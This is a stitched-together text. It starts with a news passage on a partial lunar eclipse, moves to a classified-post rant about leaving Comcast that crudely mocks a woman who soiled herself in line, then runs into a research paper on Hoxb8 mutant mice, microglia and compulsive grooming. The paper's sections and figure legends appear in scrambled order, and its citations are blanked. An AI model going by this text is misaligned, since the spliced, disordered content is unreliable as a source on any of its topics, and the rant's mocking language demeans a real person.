" The dark part of the Earth 's shadow will clip the moon , and you will see the part that lies within it will get much darker than the rest , " said Geza Gyuk , astronomer at the Adler Planetarium in Chicago , Illinois .
" Skywatchers will see the moon decrease in brightness and maybe even a change [ in ] color . "
The first stages of the eclipse will be visible across central and western sections of the North American continent at dawn .
Eastern parts of the continent will not see the event .
For those in the Pacific Basin and Asia , the eclipse will occur late Saturday night .
Skywatchers in the U.S. central and mountain time zones will catch most of the eclipse , while those within the Pacific time zone will see it in its entirety until the moon exits the shadow completely at 6:00 am PDT .
Volcano Ash May Add Flash to Sky Show
The deepest and most interesting part of the eclipse — when Earth 's shadow will fall on 54 percent of the moon 's disk — occurs at 4:38 am PDT .
At this point , when the moon is at its darkest , its face may turn red from ash thrown into the upper atmosphere by recent eruptions of the Iceland volcano Eyjafjallajokull .
( See pictures of lava exploding from the Iceland volcano 's ice cap . )
During the height of the eclipse , sunlight refracting off the scattered dust in Earth 's atmosphere is projected onto the moon — the same effect that 's in play during red sunsets .
QR Code Link to This Post
Location : 1617 S. Acoma
it 's NOT ok to contact this poster with services or other commercial interests
" How does $ 42 a month sound ? " " Can you beat free ? " I inquired .
I asked him if I could send the modem back in the mail and avoid the trip to their drop - off center .
" No . " Whatever .
Getting the $ 56 a month monkey off my back felt good no matter what .
I had no regrets at all .
You sealed the deal when you shit your pants .
That was seriously nasty .
Everyone thought it was the little kid at first , but I knew right away it was you .
I know I can't blame Comcast for whatever it is that makes you unable to control your bowels .
I know that line was long and the service fairly slow .
People have complicated fucking issues with their cable and phone .
That line was an audition for the Jerry Springer show ( I mean that in a loving way ) , complete with a woman who shits her pants .
That was unreal , lady , just unreal .
I know you did it while you were standing in line because you did n't smell that rotten when I took my place in line behind you .
Granted , that customer - service counter IS a remarkably good place to shit your pants .
The carpet is filthy .
The walls have been smeared by the hands of innumerable children .
You can't help but notice right away that the customer service agents are behind glass .
Lashonda gets mad when the account be closed .
No big deal , really .
I enjoy the pagent of human existence .
I suppose even to include the lady who shit her pants yesterday afternoon .
Comcast is too cheap to buy a rope line , so people line up as they see fit and let the kids roam free .
Holy fuck that stunk , and the line was n't going anywhere .
15 mintues of that was enough to upset my cast - iron stomach .
I trained on a vast UNDERGROUND fish market in Asia ; I know what stench is .
I could n't back up , either .
The line had formed behind me in that airless chamber .
The room was suffering .
You could see it on the stricken face of the woman who helped you .
She went in the back and threw up after you left .
First , she came to the agent helping me and asked for " the spray . "
I guess people shit themselves often there .
The people who have been standing behind me gave me sympathetic looks as I left : I had endured ground zero .
My only thought was to get outside as quickly as possible .
But that really sealed the deal for me .
My new wireless connection is great .
And free .
If I ever think I might want to go back to Comcast , all I have to do is think about the lady with scanty beard hair shitting her pants in a dingy lobby and I 'll return to my senses right away .
Imagine what her car smells like ?
Mouse Hoxb8 mutants show unexpected behavior manifested by compulsive grooming and hair removal , similar to behavior in humans with the obsessive - compulsive disorder spectrum disorder trichotillomania .
As Hox gene disruption often has pleiotropic effects , the root cause of this behavioral deficit was unclear .
Here we report that , in the brain , Hoxb8 cell lineage exclusively labels bone marrow - derived microglia .
Furthermore , transplantation of wild - type bone marrow into Hoxb8 mutant mice rescues their pathological phenotype .
It has been suggested that the grooming dysfunction results from a nociceptive defect , also exhibited by Hoxb8 mutant mice .
However , bone marrow transplant experiments and cell type - specific disruption of Hoxb8 reveal that these two phenotypes are separable , with the grooming phenotype derived from the hematopoietic lineage and the sensory defect derived from the spinal cord cells .
Immunological dysfunctions have been associated with neuropsychiatric disorders , but the causative relationships are unclear .
In this mouse , a distinct compulsive behavioral disorder is associated with mutant microglia .
Unfortunately , animal models that directly associate distinct behavioral deficits with defective microglia have been lacking .
Here we provide such a model , which should allow interrogation at the molecular genetic and cellular levels , the roles of microglia in promoting normal behavior , and how perturbation of microglia leads to pathological behavior .
The above experiments strongly support the hypothesis that the excessive pathological grooming behavior observed in Hoxb8 mutant mice originates from defective microglia , thus directly connecting hematopoietic function to mouse behavior .
The extensive role of microglia , as the brain 's monitor and responder of immune activity , in the normal function of our brain is becoming increasingly apparent .
As examples , immunological dysfunctions have been widely linked to many psychiatric disorders including OCD , major depression , bipolar disorder , autism , schizophrenia , and Alzheimer 's disease ( ) .
In addition , results from genome - wide association studies suggest that genes whose dysfunction have been implicated in immune dysfunction and / or signaling contribute to increased susceptibility to the above mentioned mental disorders ( ) .
Since implementation of grooming in rodents is rooted within the brain , we anticipated that Hoxb8 would be expressed in a neural circuit that modulates grooming behavior .
Instead , as we report here , we have surprisingly found that , in the brain , the site that generates and implements grooming behavior , the only detectable cells derived from Hoxb8 cell lineage are microglia .
Second , we demonstrate that normal bone marrow transplantation into lethally irradiated Hoxb8 mutant mice rescues the excessive pathological grooming behavior , without correcting the spinal cord defects .
Third , conditional restriction of Hoxb8 deletion to the hematopoietic system results in mice with the excessive grooming and hair removal behavioral defects , without induction of the nociceptive / spinal cord defects .
Finally and conversely , conditional deletion of Hoxb8 in the spinal cord generates mice with the spinal cord sensory defects , but with normal grooming behavior .
It was quite unexpected that disruption of a Hox gene should result in a distinct behavioral deficit such as excessive and pathological grooming ( ) .
Hox genes are normally involved in establishing body plans by providing positional values along the major axes of the embryo ( ) .
However , Hox genes also have direct roles in the formation of multiple tissues and organs , including the formation of the hematopoietic system , and , with respect to Hoxb8 , maintenance and differentiation of myeloid progenitor cells , one of the two known sources of microglia ( ) .
Hoxb8 mutant mice also show altered response to nociceptive and thermal stimuli , which have been attributed to deficiencies in the formation and organization of interneurons in the dorsal spinal cord laminae I and II that receive the majority of nociceptive inputs ( ) . further suggested that the excessive and pathological grooming defects previously described in Hoxb8 mutants result from to these sensory spinal cord defects .
Mice homozygous for a loss of function mutation in Hoxb8 show excessive grooming .
The syntax of grooming appears normal , but the number of incidences per unit time and the duration of grooming bouts are increased ( ) .
However , the behavior is pathological , for it leads to hair removal and self - inflicted open skin lesions at the over groomed sites .
This behavior is very similar to that described for humans with the obsessive - compulsive disorder ( OCD ) spectrum disorder trichotillomania , where compulsive removal of hair is also a hallmark .
This disorder is quite common in humans with an occurrence ranging from 1.9 to 2.5 per 100 in seven separate international communities ( ) .
Curiously , these mutant mice also excessively groom their wild - type cage mates .
This aspect of the phenotype suggested that the peripheral nervous system is not likely responsible for the excessive grooming behavior ( ) .
Grooming in mammals is an innate , stereotypic behavior with a well defined syntax ( ) .
The head is invariably groomed first , followed by body regions , and finally the anogenital region and tail .
This cephalocaudal progression of grooming is defined as the “ syntactic groom chain . ”
Previous studies have shown that multiple regions of the rodent brain , notably the brainstem , striatum , and cortex are used to implement the syntactic groom chain ( ) .
Next we wanted to determine if conditional deletion of Hoxb8 in the spinal cord recapitulates the nociceptive defects and whether or not they would be associated with the pathological grooming defects .
Hoxc8 cell lineage in the spinal cord has a broad pattern of expression very similar to that of Hoxb8 ( Figure 7 A ) .
However , relative to Hoxb8 , Hoxc8 is poorly expressed in the hematopoietic system .
Most importantly , the number of Hoxc8 - ICre / Rosa26 - YFP - labeled microglia in the brain is much lower ( i.e. , more than 10 - fold lower ) when compared to Hoxb8 - labeled cell lineage ( compare , for example , Figure 7 B to Figure 1 F , both derived from adult cortical brain sections ) .
Quantitation of YFPIba1 + cell counts relative to Iba1 + cells , which label microglia , using the respective Hoxb8 - ICre and Hoxc8 - ICre drivers is shown in Figure 7 C. Since Hoxc8 is strongly expressed in the spinal cord , but poorly represented within microglia , the Hoxc8 - ICre mouse can be used to determine whether or not induction of the nociceptive defects are sufficient to initiate the pathological grooming defects .
Ten such animals ( i.e. , Hoxc8 - ICre ; Hoxb8c / c ) were collected .
None of these mutant animals developed the hair removal and skin lesion patterns typical of Hoxb8 mutant mice ( Figure 7 D ) .
Also , the time engaged in grooming by these mice was not significantly greater than in their control siblings ( Figure 7 E ) .
However the latency of their response to heat was significantly longer than control siblings and was comparable to that of Hoxb8 mutant mice ( Figure 7 F ) .
Further , examination of these mutants by immunohistochemistry with calbindin and calretinin antibodies showed that ablating Hoxb8 in the Hoxc8 expression domain fully recapitulated the dorsal horn spinal cord defects typical of Hoxb8 mutant mice ( Figures 7 G–7L ) .
Thus , conditional deletion of Hoxb8 in the Hoxc8 expression domain ( i.e. , the spinal cord ) cleanly separated the nociception / dorsal spinal cord defects from the excessive pathological grooming defects .
Selective induction of the Hoxb8 - associated nociceptive / spinal cord defects ( Hoxc8 - ICre ) is not sufficient to induce the pathological grooming defects .
( G–L ) The numbers of interneurons in laminae I and II are decreased in Hoxc8 - ICre-conditional Hoxb8 mutants .
Spinal cord sections at L4–L5 levels were collected from wild - type mice ( G and J ) , Hoxb8 mutant mice ( H and K ) , and Hoxc8 - ICre- conditional Hoxb8 mutants ( I and L ) and stained for calbindin ( G–I ) and calretinin ( J–L ) .
The positive regions are highlighted with a white dashed line .
(C) Compared to the Hoxb8 lineage , only a small percentage ( < 3 % ) of ramified microglia were labeled by the Hoxc8 lineage .
The percentage of YFP - positive cells to total ramified microglia ( Iba1 - positive cells ) was determined from sections through the cerebral cortex derived from three Hoxb8 - ICre / Rosa26 - YFP ( black column ) and three Hoxc8 - ICre / Rosa26 - YFP mice ( white column ) .
The values are mean ± SEM .
∗ p < 0.05 .
( A) Hoxc8 lineage is present in all laminae of the spinal cord .
X - gal staining was performed in spinal cord sections collected from mice carrying both Hoxc8 - ICre and ROSA26 - LacZ alleles .
In order to perform tissue - specific deletion of Hoxb8 , we constructed a conditional allele in which the entire coding sequence of this gene was flanked by Lox511 sites ( Figure S1 C ) .
Mice carrying the Hoxb8 conditional allele were crossed to Tie2 Cre males to produce conditional mutants .
Five conditional mutants carrying Tie2Cre and homozygous for the Hoxb8 conditional mutation were collected , and their grooming behavior was analyzed .
Four out of the five mice developed hairless patches very similar to the patterns observed in Hoxb8 mutant mice ( Figure 6 B ) .
The grooming times , measured on the Laboras platforms , were significantly longer than control siblings and comparable to those observed in Hoxb8 mutant mice ( n = 5 ; Figure 6 C ) .
However , these mice did not exhibit heat insensitivity ( Figure 6 D ) , and immunohistochemical analysis of their dorsal spinal cord laminae I and II labeled for calbindin and calretinin appeared normal when compared to Hoxb8 mutants ( Figures 6 E–6J ) .
Thus , restricted deletion of Hoxb8 in the hematopoietic system is sufficient to induce pathological grooming in mice and , importantly , the presence of the nociceptive defects is not observed or required for induction of the aberrant grooming behavior .
To further explore the causality of the Hoxb8 mutant phenotype , we used Tie2 Cre/ loxP - based conditional mutagenesis .
Tie2 was originally considered an endothelial cell marker .
However , showed that a Tie2 Cre transgenic line displayed loxP - mediated recombination in all hematopoietic cells , as well as in endothelial cells .
In the brain , Tie2 lineage is present in blood vessels and microglia , but not in interneurons of the dorsal spinal cord ( Figure 6 A and data not shown ) .
( E–J ) No histological defects analogous to those in Hoxb8 mutant mice were found in dorsal spinal laminae of Tie2 Cre conditional mutants .
Spinal cord sections at L4–L5 levels were collected from wild - type mice , Hoxb8 mutant mice , and Tie2 Cre conditional Hoxb8 mutants .
Interneurons in laminae I and II were stained for calbindin ( E–G ) and calretinin ( H–J ) .
The regions with neurons positively staining for these markers are circumscribed with a white dashed boundary .
Scale bar : ( A ) 50 μM ; ( E–J ) 100 μM .
( A) Tie2 lineage is present in CNS microglia .
Brains and spinal cords from mice carrying the Tie2 Cre transgene and ROSA26 - YFP allele were stained with anti-GFP antibodies .
The microglial identity was confirmed by double staining with CD11b ( data not shown ) .
The first insight that the excessive grooming and hair removal behavior could be separated from the sensory spinal cord defects in our Hoxb8 mutant mice was gained from the transplantation experiments .
Irradiated Hoxb8 mutant mice transplanted with normal bone marrow show normal grooming behavior , but retained their thermal stimuli insensitivity spinal cord defects ( Figure 5 ) .
The latency of response to thermal stimuli in the bone marrow - rescued animals was comparable to that observed in Hoxb8 mutant mice and significantly longer than in wild - type mice .
Thus , while normal bone marrow transplants into irradiated Hoxb8 mutant mice efficiently rescued the pathological grooming defect , it did not restore the defective pain response .
Hoxb8 mutant mice , whose pathological grooming defects were rescued by normal bone marrow transplants , still exhibit significantly longer latency of response to heat ( 53 °C Hot Plate Test ) , comparable to the Hoxb8 mutant mice .
White column , wild - type controls ( n = 14 ) ; black column , Hoxb8 mutants ( n = 11 ) ; gray column , Hoxb8 mutants phenotype rescued with normal bone marrow ( n = 6 ) .
Data were collected 4 –5 months after bone marrow transplantation .
Columns represent the mean ± SEM .
∗ p < 0.05 versus wild - type .
Consistent with the localized scratching caused by a response to chronic itching , reported that their behavior could be alleviated by localized injection of lidocaine .
We tested whether our Hoxb8 mutant mice would respond to lidocaine treatment .
Eight Hoxb8 mutant mice and eight control sibling mice were injected with lidocaine into regions where hairless patches had developed and placed on Laboras platforms to measure their grooming periods .
Lidocaine treatment did not alter the grooming behavior of either the Hoxb8 mutant or wild - type mice ( Figure S4 B ) .
Scratching in rodents is a rather simple movement made by the hind limbs ( ) that can be distinguished from grooming by the Laboras platforms .
To determine if our Hoxb8 mutants exhibited excessive scratching , eight Hoxb8 mutants and eight wild - type mice were placed on the Laboras platforms set to score scratching .
No significant differences in time spent scratching were detected between the Hoxb8 mutant and wild - type controls ( Figure S4 A ) .
Only in mutant animals that had developed severe lesions as a consequence of compulsive , excessive grooming could increased scratching begin to be observed .
For comparison we provide measurements of time spend grooming over the same duration of time .
(C) Animals homozygous for the Hoxb8 - CreERTM knockin allele develop lesions in the posterior body .
In this mouse line , the majority of Hoxb8 exon 1 coding sequence was replaced with the CreERfusion polypeptide ( see Figure S2 D ) .
The CreERknockin effectively generates a Hoxb8 null allele , and expands the length of the Hoxb8 gene by approximately 1.5 kb .
The Hoxb8 - CreERTM mutants develop lesions in the rump and perigenital regions with a penetrance of ∼ 10 % .
( B) Lidocaine treatment does not alter the grooming behavior in Hoxb8 mutant mice .
Subcutaneous administration of lidocaine was performed to determine if local anesthesia would reduce the excessive grooming defect observed in Hoxb8 mutant mice .
However , the treated Hoxb8 mutants ( black column ) spent approximately twice as much time grooming relative to the wild - type mice ( white column ) , which is very similar to the differential observed in untreated Hoxb8 mutant .
Columns represent the mean ± SEM .
∗ p < 0.05 .
( A) Grooming and scratching can be separately analyzed by Laboras platforms .
Time spent scratching in eight pairs of Hoxb8 mutants ( black columns ) and wild - type mice ( white ) was measured in a 4 hr period .
Grooming times of Hoxb8 mutants and wild - type mice during the same period is shown for comparison .
Columns represent the mean ± SEM .
∗ p < 0.05 .
A puzzling aspect of the hair removal phenotype described byis that it appears quite different from the excessive grooming and hair removal phenotype that we observe in our Hoxb8 mutant mice .
In their study , the hairless patches and skin lesions are very localized to the dorsal rump ( ) and appear more consistent with the consequences of scratching a chronic itch .
We observe a gradual progression of hair removal along most of the ventral surface of the mouse and extending to the lateral surfaces , which correlates with the consequences of an excessive normal grooming pattern ( see , for example , Figure 3 A ) .
The hair is removed from the overgroomed areas in our mutant mice by the use of their teeth and accumulates in between their incisors , reflecting an extension of normal grooming behavior rather than scratching with their hind paws ( ) .
What we observe and have reported in our Hoxb8 mutant mice is that the grooming syntax does not appear to be altered , but rather the number and duration of grooming bouts are increased .
This aspect of the grooming phenotype has not been reported by .
The marked difference in the pattern of hair removal and the excessive normal grooming observed in our mutant animals , rather than excessive scratching , suggests that the two groups might be studying different behavioral paradigms in their respective Hoxb8 mutant mice .
have reported that mice mutant for Hoxb8 show attenuated responses to noxious and thermal stimuli and display a reduction and disorganization of interneurons in laminae I and II of the dorsal horn of the spinal cord , which receive the majority of the nociceptive and thermal sensations .
We have observed very similar insensitivity to noxious and thermal stimuli , as well as dorsal horn spinal cord defects in our Hoxb8 mutant mice ( Figure 4 ) .
Figures 4
A and 4B show intact cervical spinal cord sections from wild - type and Hoxb8 mutant mice stained with a general neuronal marker anti-Neu N. It is apparent from these histological sections that the number of neuronal cell bodies present in the dorsal horn of Hoxb8 mutant mice is significantly decreased relative to those from wild - type mice .
Immunohistochemical analysis of the spinal cord ( shown at lumbar levels 4 and 5 ) further illustrate that in Hoxb8 mutant mice , relative to control mice , disorganization and reduction in numbers are apparent in both the input sensory fibers , labeled with CGRP , as well as interneurons in laminea I and II , labeled for calbindin and calretinin ( Figures 4 D–4I ) .
Nociceptive insensitivity was demonstrated by significantly greater latency time required by Hoxb8 mutant mice to respond to heat , relative to wild - type control mice ( Figure 4 C ) . further suggested that the nociceptive / spinal cord defects account for the excessive grooming and hair removal phenotypes that we previously described .
( D–I ) Anatomical defects in dorsal spinal cord of Hoxb8 mutant mice .
Spinal cord sections shown at L4–L5 from wild - type mice ( D–F ) and Hoxb8 mutant mice ( G–I ) .
The spinal cord sections were labeled with a marker for nociceptive sensory fibers ( CGRP ) and with interneuron markers for lamina I and II ( calbindin and calretinin ) .
The numbers of interneurons in laminae I and II are decreased and disorganized in Hoxb8 mutant mice relative to wild - type mice .
Scale bar : 100 μM .
( A and B ) Spinal cord sections at cervical levels in wild - type mice ( A ) and Hoxb8 mutants ( B ) stained with anti-NeuN antibody .
These sections are representative of wild - type and Hoxb8 mutant sections taken along the spinal cord from C4 through the lumbar region L5 .
Neuron counts are decreased and the remaining interneurons are noticeably disorganized in the mutant spinal laminae .
The role of Hoxb8 in hematopoiesis has not been fully elucidated .
In the literature , based on experiments involving Hoxb8 overexpression , a case has been made for Hoxb8 involvement in the maintenance and differentiation of the myeloid progenitor pool ( ) .
The very early expression of Hoxb8 during hematopoiesis and our bone marrow transplantation competition studies suggest a broader role for Hoxb8 in hematopoiesis , affecting both the myeloid and lymphoid lineages .
Do T and B cells contribute to the compulsive grooming phenotype observed in Hoxb8 mutant mice ?
To test this possibility , bone marrow transplantations using bone marrow derived from RAG2 mice , which do not produce T and B cells , into irradiated Hoxb8 mutant mice were carried out .
These experiments show that RAG2 bone marrow can rescue the excessive pathological grooming phenotype .
However , the robustness of rescue is not as high as with wild - type bone marrow either in terms of the extent of hair replenishment of the hairless patches ( Figures S3 D and S3E ) or in time spent grooming by these animals ( Figure S3 F ) .
These experiments suggest that T and B cells do not have a primary role in the induction of the Hoxb8 mutant pathological grooming phenotype , but that T and B cell deficiencies may contribute to the severity of the phenotype .
The above experiments demonstrate that transplantation of normal bone marrow can efficiently rescue the Hoxb8 mutant grooming phenotypes , including restoration of the hairless patches , healing of open lesions , and reduction of excessive grooming times back to baseline .
In separate experiments we have shown that CAG - GFP - labeled bone marrow ( ) transferred into wild - type - irradiated mice can be detected in brain microglia 4 weeks after transplantation ( Figure S3 A ) and increases by 12 weeks after transplantation ( Figure S3 B ) .
The lower efficiency of conferring the Hoxb8 mutant phenotype to irradiated wild - type mice following transplantation of Hoxb8 mutant bone marrow , compared to efficient rescue of the mutant phenotype by transplantation of normal bone marrow into irradiated Hoxb8 mutant mice , appears to be a consequence of the lower robustness of Hoxb8 mutant bone marrow .
Reconstitution of lethally irradiated wild - type mice with bone marrow containing 50 % GFP labeled wild - type cells and 50 % unlabeled Hoxb8 mutant cells showed that myeloid and T cells derived from Hoxb8 mutant bone marrows were at a measurable disadvantage relative to the normal GFP - labeled wild - type cells blood lineages ( Figure S3 C ) .
In contrast , B cells derived from Hoxb8 mutant bone marrow were at a competitive advantage relative to the wild - type cells .
( D–F ) RAG2 Mutant Bone Marrow Transplantations Rescue Hairless Patches and Reduce Excessive Grooming , Related to Figure 3 .
( D and E ) Due to a defect in DNA rearrangement , RAG2 mutants are B cell and T cell - deficient .
When RAG2 mutant bone marrow was transplanted into Hoxb8 mutant mice , three out of 7 irradiated Hoxb8 mutants exhibited hair re-growth after 3.5 - months ( A ) or 4.5 - months ( B ) .
( F ) Grooming times of these bone marrow chimeras were measured on Laboras platforms 4 to 5 months after bone marrow transplantation relative to Hoxb8 mutants ( black bar ) and wild type controls ( white bar ) .
Grey bar represents the grooming phenotype of Hoxb8 mutant mice rescued with normal bone marrow .
Stippled bar shows the grooming times of Hoxb8 mutant mice rescued with RAG2 mutant bone marrow .
Columns represent the mean ± SEM .p < 0.05 versus mutant .
(C) Competitive repopulation test with bone marrow from Hoxb8 mutant mice .
Bone marrow containing 50 % of CAG - GFP - labeled normal bone marrow cells and 50 % of non-GFP Hoxb8 mutant bone marrow cells were transplanted into irradiated wild - type recipients .
Peripheral blood samples were collected 2 months after bone marrow transplantation and the percentage of GFP positive cells was determined in granulocyte / monocyte , B cell and T cell lineages .
White columns represent the relative cell counts of GFP - positive cells derived from normal bone marrow .
Black columns show the fractions of GFP negative cells derived from Hoxb8 mutant bone marrow ( n = 3 ) .
Columns represent the mean ± SEM .
∗ p < 0.05 .
( A and B ) Infiltration of microglia in the cerebral cortex after bone marrow transplantation .
Bone marrow cells were collected from CAG - GFP mice and transplanted to irradiated wild - type recipients .
Brains of these bone marrow chimeras were dissected ( A ) 4 weeks or ( B ) 12 weeks after bone marrow transplantation , sectioned , stained with anti-GFP antibodies and analyzed with confocal microscopy .
( A ) Four weeks after bone marrow transplantation , only a few cells were found in the cerebral cortex , and they did not display ramified microglia morphology .
CC , cerebral cortex ; CP , choroid plexus .
( B ) Twelve weeks after bone marrow transplantation , ∼30 % of total microglia were GFP positive and showed ramified microglial morphology .
Scale bar : 100 μM .
We showed above that the only cells derived from Hoxb8 cell lineage detectable in the adult mouse brain are microglia , likely of bone marrow origin .
To investigate whether a dysfunction in the hematopoietic system is responsible for the Hoxb8 - excessive grooming and hair removal phenotypes , bone marrow transplantation experiments were conducted .
Four different experimental groups were included .
Bone marrow cells were collected from both wild - type or Hoxb8 mutant adult mice and transplanted into either irradiated Hoxb8 mutant or wild - type mice at 2 months of age , respectively .
The development or regrowth of hairless patches , as well as grooming times , were monitored in all mice receiving transplants over a 5 month period .
In the control group , in which irradiated wild - type mice received wild - type bone marrow cells , the grooming behavior remained normal , and no hairless patches were detected for the duration of the experiment ( n = 10 ; data not shown ) .
In the second control group , irradiated Hoxb8 mutant mice received Hoxb8 mutant bone marrow .
These animals showed deteriorating health , and 6 out of 11 animals in this group died before the observation period was completed , presumably due to difficulty to reestablish bone marrow with a mutant erythropoietic lineage .
The surviving recipients continued to exhibit very severe grooming and self - mutilation phenotypes , without detectable hair regrowth during the observation period .
Figure 3
A shows one of the Hoxb8 mutants 4 weeks after transplantation with normal bone marrow .
In the group of irradiated Hoxb8 mutant mice receiving normal , wild - type bone marrow cells , the hairless patches continued to develop for the first few weeks after transplantation .
However , starting from 3 months after bone marrow transplantation , six of ten animals showed extensive regrowth of hair in the hairless areas and healing of open lesions .
Four of them fully recovered and were indistinguishable from wild - type mice ( Figures 3 B and 3C ) .
Grooming time was assessed on the Laboras platforms 4 months after bone marrow transplantation .
The grooming times of these animals ( n = 6 ) decreased significantly to levels comparable to those of control mice ( Figure 3 D ) .
Finally , among the irradiated wild - type mice that were transplanted with bone marrow collected from Hoxb8 mutant mice , two of ten animals developed hairless patches very similar to the phenotype observed in Hoxb8 mutant mice ( Figure 3 E ) .
These mice ( n = 2 ) also showed increased grooming times relative to wild - type animals , but not increases as high as normally shown in Hoxb8 mutant mice ( Figure 3 F ) .
( F) Grooming times of two wild - type mice transplanted with mutant bone marrow that developed hairless patches .
These experimental animals ( gray column , n = 2 ) showed elevated grooming times , although not as long as the average observed in a large cohort of Hoxb8 mutants .
Error bars represent SEM .
∗ p < 0.05 versus wild type .
(D) Laboras data collected over a 24 hr period with Hoxb8 mutant mice transplanted with wild - type bone marrow cells show significant decrease in grooming times relative to Hoxb8 mutant mice .
White bar represents wild - type controls ( n = 22 ) relative to Hoxb8 mutants ( n = 25 ) .
Gray bar indicates the grooming time of Hoxb8 mutant mice rescued by normal bone marrow transplants ( n = 6 ) .
All values are mean ± standard error of the mean SEM .
∗ p < 0.05 versus mutant .
The presence of Hoxb8 lineage in the hematopoietic compartment was directly tested .
Peripheral blood was collected and sorted by size and then by fluorescently labeled antibodies to cell surface antigens that distinguish the different types of white blood cells .
All tested hematopoietic lineages , including platelets , granulocytes / monocytes , B cells , and T cells , exhibited Hoxb8 - YFP signal ( Figures 2 A–2 F ) .
Observation of the YFP signal in both myeloid and lymphoid lineages is suggestive of Hoxb8 expression in stem cells or multipotent progenitor cells .
To further support this hypothesis , bone marrow cells from Hoxb8 - ICre / Rosa26 - YFP mice were collected and examined by fluorescence microscopy .
Most of the bone marrow cells were YFP positive ( Figure 2 G ) .
In addition , the Hoxb8 - YFPsignal was present in Sca1+C - kit+ cells , consistent with Hoxb8 expression in hematopoietic stem cells ( Figure 2 H ) .
It has been reported that Hoxb8 is not expressed in mature hematopoietic cells ( ) .
The above results suggest that Hoxb8 is expressed at early stages of hematopoiesis but subsequently downregulated in fully differentiated blood cells .
(H) Most of the cells in the hematopoietic stem cell and multipotent progenitor cell domain are YFP positive .
( Left ) FACS analysis with Sca - 1 and c -kit markers .
The cells shown in the rectangle were further analyzed for YFP fluorescence .
The black histogram ( top right ) represents YFP fluorescence detected in cells collected from ROSA26 - YFP reporter mice in the absence of the Hoxb8 - ICre driver , whereas the white histogram ( bottom right ) represents cells collected from ROSA26 - YFP reporter mice carrying the Hoxb8 - ICre driver .
( D–F ) Analysis of blood samples collected from ROSA26 - YFP reporter mice combined with the Hoxb8 - ICre driver .
Markers used were as follows : ( A and D ) Mac1 / Gr - 1 and YFP ; ( B and E ) CD19 and YFP ; ( C and F ) CD4 / CD8 and YFP .
To assess if the Hoxb8 mutation affects the number of microglia present in the adult brain , comparable sections of the brain were evaluated for the presence of Iba1 - positive cells in six Hoxb8 mutants and six control mice .
We consistently observe an approximate 15 % reduction of total number of microglia present in Hoxb8 mutant versus control mice ( Figure S2 ) .
Currently , we cannot specifically label Hoxb8 mutant ( i.e. , Hoxb8 ) microglial lineage because our Hoxb8 - ICre driver is a “ knockin ” IRES - Cre driver , which does not itself affect Hoxb8 function .
Therefore , the above count for reduction of microglia in Hoxb8 mutant mice may represent an underestimate of the actual reduction of the hematopoietic bone marrow - derived microglia subpopulation , should such loss be partially compensated by an increase in the resident non-Hoxb8 - expressing microglial subpopulation .
Microglial counts per area unit were determined in 4 - to 6 - month - old wild - type mice and Hoxb8 mutants in comparable brain regions , including the orbital cortex , cingulate cortex , and dorsal striatum .
These brain regions are known for their role in compulsive behavior .
Although the origin of microglia is still debated , there is general agreement that at least one subpopulation is of bone marrow origin , ( i.e. , derived from circulating monocytes ; ) .
The time of first appearance and the site of entry of Hoxb8 - labeled microglia is consistent with this subpopulation being of hematopoietic , bone marrow - derived origin .
In newborn mice , very few Hoxb8 - labeled cells are observed in the brain and these cells are found predominantly in the choroid plexus ( Figure 1 D ) , meninges , and the ventricular lining , with their numbers declining with increased distance from the ventricular zone .
This gradient suggests migration of YFP - positive cells from the ventricular zone into the forebrain areas .
Between P2 and P14 , YFP - positive cell count in the mouse brain increases dramatically and is then maintained at this high level ( Figures 1 E and 1 F and data not shown ) .
The expression pattern of Hoxb8 in the adult brain is broad ( ) .
However , the expression level is very low and dispersed in the brain , making it difficult to identify the cell type (s ) expressing Hoxb8 .
To identify the Hoxb8 cell lineage in the mouse brain , we generated a Hoxb8 - IRES - Cre ( Hox b8 - ICre onwards ) driver that could be used to activate Cre-dependent LacZ or YFP reporter genes targeted to the ubiquitously expressed ROSA26 locus ( Figure S1 B ; ) .
In mice carrying both the Hoxb8 - ICre driver and ROSA26 - YFP reporter alleles , activation of Hoxb8 expression also triggers YFP production .
Brains of such mice were collected at pre- and postnatal stages and examined by immunohistochemistry .
In adult brains , YFP - positive cells can be found throughout the brain , but consistent with previous results , predominantly in the cerebral cortex , striatum , olfactory bulb , and brainstem ( data not shown ) .
These cells appear morphologically to be microglia and indeed coexpress the general microglia marker CD11b and Iba1 , a marker of activated microglia ( Figures 1 A–1C and data not shown ) , indicating that Hoxb8 is expressed in microglia or their progenitor cells .
Notably , not all microglia in the brain are YFP positive , suggesting that Hoxb8 expression was present only in a subpopulation of microglia or their progenitors ( ∼40 % of total , see Figure 7 C ) .
(D) Cortical microglia originating from the Hoxb8 cell lineage first appear in the brain during the first two postnatal days ( P2 ) , in the choroid plexus , and in association with the ventricular lining .
( A–F ) Analysis of Hoxb8 lineage in mice heterozygous for the Hoxb8 - ICre and ROSA26 - YFP alleles .
To determine if cells of Hoxb8 lineage in the brain are microglia , the identity of YFP - positive cells was examined by immunohistochemistry .
Sagittal sections of the adult cerebral cortex were costained with anti-GFP antibody ( A ) and anti-CD11b antibody ( B ) .
Hoxb8 mutant behavior is characterized by excessive pathological grooming .
Previously , we determined the number and duration of grooming bouts from continuous video recording of mouse activity ( ) .
This procedure was robust but very labor intensive .
More recently , we have been using technology developed by B.V.
Metris based on the use of very sensitive vibration detectors ( Laboras platforms ) .
Each activity such as drinking , eating , rearing , climbing , locomotion , immobility , grooming , and scratching is associated with characteristic patterns of vibration , which are continuously recorded .
A computer algorithm then interprets specific vibration patterns as individual behaviors .
The advantage of this approach is that behavior is classified automatically and collected unobtrusively over any chosen period of time .
We typically monitor activity over 24 hr periods .
We have evaluated the Laboras platforms for their assessment of time spent grooming by co-monitoring mouse activity using our video camera system .
The Laboras platforms are remarkably accurate , comparable to human classification and far less labor intensive .
Figure S1 A ( available online ) shows the average time spent grooming for 25 Hoxb8 mutant mice and 22 controls over 24 hr periods as measured by the Laboras platforms .
These results compare very well with those previously obtained by analyzing continuous video recordings , illustrating that on average Hoxb8 mutant mice spend approximately twice as much time grooming as their wild - type littermates ( ) .
The penetrance for excessive grooming in Hoxb8 mutant mice is 100 % .
(E) Hoxb8 - CreERTM allele was prepared by replacing the Hoxb8 exon 1 ( ATG to BamHI site ) with CreER TM fusion that enables temporal control of lox -specific recombination in the Hoxb8 expression domain .
The external probes used in screening for accurate recombination events are indicated .
All neo selection markers were flanked with FRT sites and subsequently removed by breeding with FLPe deleter mice .
Selected landmark restriction sites are shown .
pA , polyadenylation site .
Discussion
Herein we provide strong support for the hypothesis that the pathological grooming behavior observed in Hoxb8 mutant mice results from a deficiency in microglia .
